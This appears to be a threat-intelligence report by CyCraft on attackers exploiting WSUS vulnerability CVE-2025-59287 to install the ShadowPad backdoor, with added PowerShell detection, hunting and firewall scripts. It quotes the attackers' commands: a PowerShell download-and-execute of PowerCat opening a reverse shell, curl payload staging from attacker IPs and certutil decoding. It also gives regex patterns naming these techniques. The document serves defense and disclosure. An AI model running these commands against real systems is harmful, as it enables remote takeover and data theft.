【CyCraft Monthly Intelligence】Microsoft WSUS Vulnerability Exploited by Chinese Threat Actors with ShadowPad

Threat and Impact

Following Microsoft's vulnerability disclosure on October 14, 2025, and the public release of a Proof of Concept (PoC) on October 22, attackers rapidly weaponized CVE-2025-59287, a critical Remote Code Execution (RCE) vulnerability in Windows Server Update Services (WSUS). Multiple sources have observed attacks targeting WSUS-enabled servers to deploy the ShadowPad backdoor. Attackers leverage PowerCat to obtain a system-level shell and utilize native system tools (curl and certutil) to deploy and install ShadowPad via DLL side-loading.

Analyst Perspective

The key warning from this incident is the extremely short window between the public PoC release and in-the-wild exploitation. Attackers abuse common tools such as PowerShell, certutil.exe, and curl.exe to minimize reliance on known malware, which makes signature-based detection much harder. ShadowPad executes primarily in memory via DLL side-loading, injects itself into common Windows processes, and maintains persistence through Run keys and scheduled tasks to evade detection and ensure long-term access. All Windows servers running WSUS, particularly those exposed to the Internet on TCP 8530/8531 or with weak access controls, are the main targets.

Incident Description

ShadowPad is a privately sold backdoor commonly associated with China-nexus APT groups. It establishes a covert, persistent access channel over HTTP/HTTPS on port 443, using browser-mimicking headers to blend in with legitimate traffic. WSUS is core enterprise infrastructure; by exploiting the RCE vulnerability to gain SYSTEM-level privileges on the WSUS server, attackers establish an initial foothold from which to move laterally and control the entire environment.

Technical Details

Reconnaissance

Attackers scan for WSUS servers accessible via TCP 8530/8531, identifying targets vulnerable to CVE-2025-59287 (WSUS RCE).

Initial Access

By exploiting CVE-2025-59287 to execute commands with SYSTEM privileges, attackers immediately use PowerShell to download and execute PowerCat, obtaining an interactive CMD shell.

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 154.17.26[.]41 -p 8080 -e cmd

Execution

Upon gaining initial access, attackers execute legitimate Windows utilities (curl.exe and certutil.exe) to install the ShadowPad malware.

curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt
certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp
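The following is an added detection example, not code from the CyCraft report: it flags the living-off-the-land command-line patterns from the Initial Access and Execution stages above (IEX/DownloadString, PowerCat, curl staging into user directories, certutil -decode into ProgramData) in process-creation command lines such as Sysmon Event ID 1 or Security 4688 exports. The sample command lines are constructed for illustration, with placeholder hosts.

```powershell
# Added example: match the LotL patterns from this campaign in process-creation command lines.
$patterns = @(
    @{ Name = 'PowerShell remote script download'; Regex = '(?i)powershell.*(IEX|Invoke-Expression).*(DownloadString|DownloadFile|Invoke-WebRequest)' },
    @{ Name = 'PowerCat reverse shell';            Regex = '(?i)powercat\s+-c\s+\S+\s+-p\s+\d+\s+-e\s+cmd' },
    @{ Name = 'curl staging payload to disk';      Regex = '(?i)\bcurl(\.exe)?\s+h(xx|tt)ps?://.*\s-o\s+\S*\\(users|programdata)\\' },
    @{ Name = 'certutil decoding staged payload';  Regex = '(?i)\bcertutil(\.exe)?\s+-decode\s+\S+\s+\S*\\programdata\\' }
)

function Test-LotLCommandLine {
    # Returns the name of the first matching pattern, or $null when the command line looks benign.
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($p in $patterns) {
        if ($CommandLine -match $p.Regex) { return $p.Name }
    }
    return $null
}

# Constructed samples: two benign admin commands, then the campaign's command shapes
# (hosts replaced with placeholders; real logs carry the attacker's infrastructure).
$samples = @(
    'powershell.exe -c Get-Service wsusservice',
    'certutil.exe -verify C:\certs\server.cer',
    "powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString('https://example.invalid/powercat.ps1');powercat -c 10.0.0.5 -p 8080 -e cmd",
    'curl http://10.0.0.5:42306/tmp.txt -o C:\users\alice\tmp.txt',
    'certutil -decode C:\users\alice\tmp.txt C:\programdata\0C137A80.tmp'
)

foreach ($s in $samples) {
    $hit = Test-LotLCommandLine -CommandLine $s
    if ($hit) { Write-Output "[ALERT] $hit :: $s" }
}
```

Feed real command lines in place of $samples (for example the CommandLine field of Sysmon Event ID 1) and correlate hits on the WSUS host with the service's own process tree for triage.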

DLL Side-Loading Activating ShadowPad:

  • Legitimate EXE: ETDCtrlHelper.exe (MD5: 564e7d39a9b6da3cf0da3373351ac717)
  • Malicious DLL: ETDApix.dll (MD5: 27e00b5594530e8c5e004098eef2ec50)
  • Static configuration: 0C137A80.tmp (MD5: 85b935e80e84dd47e0fa5e1dfb2c16f4)

Because the malicious DLL is placed alongside the legitimate EXE, the trusted executable loads it, and the DLL then decrypts or loads the ShadowPad core. This process occurs entirely in memory.
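As an added hunting example (not from the CyCraft report), the sweep below looks for the three side-loading artifacts listed above by MD5 anywhere under the staging locations the report names. The search roots and the 20 MB size filter are assumptions; widen them if your layout differs.

```powershell
# Added example: locate the ShadowPad side-loading triplet by hash on a WSUS host.
$knownBad = @{
    '564e7d39a9b6da3cf0da3373351ac717' = 'ETDCtrlHelper.exe (legitimate EXE abused for side-loading)'
    '27e00b5594530e8c5e004098eef2ec50' = 'ETDApix.dll (malicious loader DLL)'
    '85b935e80e84dd47e0fa5e1dfb2c16f4' = '0C137A80.tmp (static configuration)'
}
# Assumed search roots: the report's staging paths live under ProgramData and user profiles.
$roots = @('C:\ProgramData', 'C:\Users')

function Find-ShadowPadArtifacts {
    param([string[]]$SearchRoots)
    # Only files small enough to be a loader or config are hashed, keeping the sweep fast.
    Get-ChildItem -Path $SearchRoots -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 20MB } |
        ForEach-Object {
            $md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($md5 -and $knownBad.ContainsKey($md5.ToLower())) {
                [pscustomobject]@{
                    Path     = $_.FullName
                    MD5      = $md5.ToLower()
                    Artifact = $knownBad[$md5.ToLower()]
                    Written  = $_.LastWriteTimeUtc   # helps build the intrusion timeline
                }
            }
        }
}

$hits = Find-ShadowPadArtifacts -SearchRoots $roots
if ($hits) { $hits | Format-Table -AutoSize } else { 'No known ShadowPad side-loading artifacts found.' }
```

A hit on ETDCtrlHelper.exe alone is not conclusive (it is a legitimate binary); the EXE and ETDApix.dll sitting in the same directory outside a vendor install path is the tell.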

Persistence

  • Persistence registry key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • Value: "Q-X64"
  • Scheduled task: under the Microsoft\Windows\UPnP path, named "Microsoft Corporation"
  • Startup locations:
    • %ProgramFiles%\Q-X64\Q-X64.exe
    • %APPDATA%\Q-X64\Q-X64.exe
    • %LOCALAPPDATA%\Q-X64\Q-X64.exe
    • %TEMP%\Q-X64\Q-X64.exe
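The script below is an added example, not part of the CyCraft report: run from an elevated PowerShell on the WSUS host, it checks the Run value, the scheduled task and the four startup locations listed above. Because %APPDATA%, %LOCALAPPDATA% and %TEMP% are per-user, it also sweeps every profile under C:\Users (an assumed profile root).

```powershell
# Added example: hunt for the ShadowPad persistence artifacts described in this report.
$findings = @()

# 1. Run key value "Q-X64" under HKLM
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run -and ($run.PSObject.Properties.Name -contains 'Q-X64')) {
    $findings += [pscustomobject]@{ Type = 'RunKey'; Location = "$runKey\Q-X64"; Detail = $run.'Q-X64' }
}

# 2. Scheduled task "Microsoft Corporation" under \Microsoft\Windows\UPnP\
$task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\UPnP\' -TaskName 'Microsoft Corporation' -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings += [pscustomobject]@{ Type = 'ScheduledTask'; Location = $task.TaskPath + $task.TaskName; Detail = $actions }
}

# 3. Startup locations: the current context's variables plus every user profile (assumed under C:\Users).
$paths = @(
    "$env:ProgramFiles\Q-X64\Q-X64.exe",
    "$env:APPDATA\Q-X64\Q-X64.exe",
    "$env:LOCALAPPDATA\Q-X64\Q-X64.exe",
    "$env:TEMP\Q-X64\Q-X64.exe"
)
$paths += Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    "$($_.FullName)\AppData\Roaming\Q-X64\Q-X64.exe",
    "$($_.FullName)\AppData\Local\Q-X64\Q-X64.exe",
    "$($_.FullName)\AppData\Local\Temp\Q-X64\Q-X64.exe"
}
foreach ($p in ($paths | Sort-Object -Unique)) {
    if (Test-Path -LiteralPath $p) {
        $md5 = (Get-FileHash -LiteralPath $p -Algorithm MD5).Hash.ToLower()
        $findings += [pscustomobject]@{ Type = 'StartupFile'; Location = $p; Detail = "MD5 $md5" }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No Q-X64 persistence artifacts found.' }
```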

Defense Evasion

  • Living off the Land (LotL): built-in tools are used throughout, PowerShell to download and run PowerCat, curl.exe to stage files, and certutil.exe to decode payloads, minimizing reliance on custom malware.
  • DLL side-loading: the trusted ETDCtrlHelper.exe is abused to load ETDApix.dll, hiding the execution chain from signature-based monitoring.
  • Memory execution: the loader operates entirely in memory, leaving only 0C137A80.tmp as a temporary disk artifact and reducing the footprint of obvious PE files.
  • Masquerading and benign naming: payloads are staged as .tmp files, and persistence mechanisms use names that mimic Microsoft conventions, such as the "Microsoft Corporation" task or "Q-X64" entries.
  • Network obfuscation: C2 traffic uses HTTP POST over port 443 and mimics legitimate browser headers (Firefox 87 User-Agent, Accept-Language, gzip/deflate) to evade anomaly detection.

Command and Control

  • Stage 1: gain control via PowerCat (reverse shell).
    powercat -c 154.17.26[.]41 -p 8080 -e cmd
  • Stage 2: ShadowPad C2 callback and command.
    Endpoint: hxxp://163.61.102[.]245:443/
    Protocol: HTTP/HTTPS POST
    Headers (mimicking Firefox):
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
    Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
    Accept-Encoding: gzip, deflate
    Accept: text/html, application/xhtml+xml, image/jxr, */*
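As an added example (not from the CyCraft report), the function below scores proxy or web-log entries against the Stage 2 beacon profile above: the known endpoint, a plain-HTTP POST to tcp/443, the outdated Firefox 87 User-Agent and the exact Accept-Language string. The tab-separated log layout and the sample lines are constructed; adapt the split to your proxy's format.

```powershell
# Added example: fingerprint the ShadowPad Stage 2 beacon in web-proxy log lines.
$c2Endpoints   = @('163.61.102.245:443')
$shadowPadUA   = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'
$shadowPadLang = 'en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2'

function Test-ShadowPadBeacon {
    # Returns the list of reasons a request resembles the beacon; an empty list means no match.
    param([string]$Method, [string]$Url, [string]$UserAgent, [string]$AcceptLanguage)
    $reasons = @()
    $u = [uri]$Url
    if ($c2Endpoints -contains "$($u.Host):$($u.Port)") { $reasons += 'known C2 endpoint' }
    # A cleartext HTTP POST to port 443 is a scheme/port mismatch real browsers do not produce.
    if ($u.Scheme -eq 'http' -and $u.Port -eq 443 -and $Method -eq 'POST') { $reasons += 'HTTP POST to tcp/443' }
    if ($UserAgent -eq $shadowPadUA) { $reasons += 'Firefox 87 User-Agent (long end-of-life)' }
    if ($AcceptLanguage -eq $shadowPadLang) { $reasons += 'ShadowPad Accept-Language fingerprint' }
    return ,$reasons
}

# Constructed log lines (time, client, method, url, user-agent, accept-language):
# a legitimate update check, a beacon to a placeholder host, and a beacon to the reported C2.
$log = @(
    "2025-10-24T09:00:01Z`t10.1.2.3`tGET`thttps://www.update.microsoft.com/`tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130`ten-US,en;q=0.9",
    "2025-10-24T09:05:17Z`t10.1.2.3`tPOST`thttp://c2.example.invalid:443/`t$shadowPadUA`t$shadowPadLang",
    "2025-10-24T09:05:47Z`t10.1.2.3`tPOST`thttp://163.61.102.245:443/`t$shadowPadUA`t$shadowPadLang"
)

foreach ($line in $log) {
    $time, $client, $method, $url, $ua, $lang = $line -split "`t"
    $why = Test-ShadowPadBeacon -Method $method -Url $url -UserAgent $ua -AcceptLanguage $lang
    # Two independent indicators are required before alerting, so a lone old browser does not page anyone.
    if ($why.Count -ge 2) { Write-Output "[ALERT] $time $client -> $url : $($why -join ', ')" }
}
```

The header-based indicators survive a change of C2 address, which is why they are scored alongside the IP rather than relying on the IP alone.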

Exfiltration

Data is exfiltrated via the C2 channel at 163.61.102[.]245:443.

Mitigation

Remove the WSUS RCE attack vector

Apply Microsoft's security updates for CVE-2025-59287 to all WSUS servers immediately. A reboot is required to complete mitigation and remove the RCE vector exploited in this campaign. If patching must be delayed, temporarily disable the WSUS server role or block TCP ports 8530/8531 at the host/perimeter firewall.

Manage WSUS exposure

Secure WSUS from direct Internet exposure by placing it behind a firewall. Restrict access to the necessary subnets and administrators only. Limit outbound connections solely to Microsoft Update endpoints and block unnecessary inbound traffic on ports 8530/8531. Enforce HTTPS on 8531 and disable HTTP on 8530.
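The following is an added example, not from the CyCraft report, of applying the exposure controls above and the emergency block from the patching step with Windows Defender Firewall cmdlets on the WSUS host. $AllowedSubnets is an assumed placeholder; replace it with your client and administrator ranges.

```powershell
# Added example: scope inbound WSUS ports to approved subnets, with an emergency block option.
$AllowedSubnets = @('10.10.0.0/16', '10.20.5.0/24')   # assumption: replace with real client/admin ranges
$WsusPorts      = @('8530', '8531')

# 1. Narrow every existing inbound allow rule for 8530/8531 (including those the WSUS role
#    created) from "Any" remote address down to the approved subnets.
Get-NetFirewallPortFilter | Where-Object {
        $_.Protocol -eq 'TCP' -and ($_.LocalPort | Where-Object { $WsusPorts -contains $_ })
    } | Get-NetFirewallRule | Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' } |
    Set-NetFirewallRule -RemoteAddress $AllowedSubnets

# 2. Add an explicit scoped allow rule so access keeps working if the role's rules are removed.
New-NetFirewallRule -DisplayName 'WSUS - clients and admins only' -Direction Inbound `
    -Protocol TCP -LocalPort $WsusPorts -RemoteAddress $AllowedSubnets -Action Allow -Profile Any | Out-Null

# 3. Emergency control while CVE-2025-59287 is unpatched: block rules override allow rules,
#    so this cuts all inbound WSUS traffic until it is lifted after the patch and reboot.
function Set-WsusEmergencyBlock {
    param([switch]$Remove)
    $name = 'WSUS - emergency block (CVE-2025-59287)'
    if ($Remove) { Remove-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue; return }
    New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP `
        -LocalPort $WsusPorts -Action Block -Profile Any | Out-Null
}
# Set-WsusEmergencyBlock            # apply while waiting for the patch window
# Set-WsusEmergencyBlock -Remove    # lift after patching and rebooting

# Forcing HTTPS-only (8531) is an IIS/WSUS setting (wsusutil.exe configuressl), not a firewall rule;
# once it is in place, drop '8530' from $WsusPorts so the cleartext port has no allow rule at all.
```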

Harden WSUS host configuration

Implement least-privilege ACLs to prevent unauthorized writes to Program Files, ProgramData, AppData, and Temp. Enforce an AppLocker/WDAC allow-list so that only approved, signed binaries run, blocking unauthorized DLL side-loading paths. Reduce the side-loading attack surface by keeping SafeDllSearchMode enabled and removing redundant software.

Detect and block malicious infrastructure

Enterprises should proactively monitor and block malicious infrastructure related to this incident, including IPs, URLs, and sample hashes. For details, please refer to the IOC section.


Reference

IoCs (Indicators of Compromise)

Name          MD5                               SHA-1                                     SHA-256
ETDApix.dll   27e00b5594530e8c5e004098eef2ec50  2e67487ec646ec056bc54976da5e68e395034d7b  d429934b06de67c156dc559b33c34db5e02bc56ac2c1cd45ee03e6a21cf003af
0C137A80.tmp  85b935e80e84dd47e0fa5e1dfb2c16f4  -                                         -
IP

  • 154.17.26.41:8080
  • 149.28.78.189:42306

URL

hxxp://163.61.102[.]245:443

Malicious File Paths

  • %ProgramFiles%\Q-X64\Q-X64.exe
  • %APPDATA%\Q-X64\Q-X64.exe
  • %LOCALAPPDATA%\Q-X64\Q-X64.exe
  • %TEMP%\Q-X64\Q-X64.exe

Commands with Q-X64 Parameters

  • "%PROGRAMFILES%\Windows Mail\WinMail.exe" Q-X64
  • "%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe" Q-X64
  • "%ProgramFiles%\Windows Media Player\wmplayer.exe" Q-X64
  • "%SystemRoot%\system32\svchost.exe" Q-X64

About CyCraft

CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.
